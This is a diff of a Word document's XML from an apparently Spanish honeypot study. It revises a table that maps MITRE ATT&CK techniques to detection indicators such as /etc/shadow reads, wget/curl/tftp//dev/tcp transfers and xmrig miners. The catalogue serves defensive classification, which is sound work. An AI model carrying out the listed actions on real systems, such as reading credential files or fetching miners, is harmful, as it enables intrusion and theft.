+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Credential Access</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OS Credential Dumping: /etc/passwd and /etc/shadow</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1003.008</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Lectura de /etc/shadow</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">System Information Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1082</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">uname, /proc/cpuinfo, free, nproc, lscpu</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Account Discovery: Local Account</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1087.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Lectura de /etc/passwd y /etc/group</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">System Owner/User Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1033</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">whoami, id, w, who, last</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Process Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1057</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ps, top, pgrep, pidof</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">System Network Configuration Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1016</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ifconfig, ip a, route, resolv.conf</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">System Network Connections Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1049</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">netstat, ss, lsof -i</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">File and Directory Discovery</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1083</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">ls, find /</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Command and Control</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ingress Tool Transfer</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1105</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">wget, curl, tftp, ftpget, /dev/tcp</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="850"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
           <w:p>
@@ -15693,64 +16899,67 @@
         </w:tc>
         <w:tc>
           <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Resource Hijacking</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="center"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">T1496</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:line="276"/>
-              <w:jc w:val="left"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-                <w:b w:val="false"/>
-                <w:bCs w:val="false"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Descarga de criptomineros (xmrig)</w:t>
+            <w:tcW w:type="pct" w:w="1700"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Resource Hijacking: Compute Hijacking</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="800"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">T1496.001</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1650"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">xmrig, minerd, stratum+tcp, miner</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -15771,20 +16980,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 2. Mapeo MITRE ATT&amp;CK esperado.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:line="360"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t xml:space="preserve"/>
+        <w:t xml:space="preserve">Tabla 2. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -15803,7 +16999,26 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Este mapeo se completará y validará con los datos reales capturados durante la fase de exposición del honeypot. Cada técnica se acompañará de la evidencia concreta extraída de los logs y de una recomendación defensiva específica.</w:t>
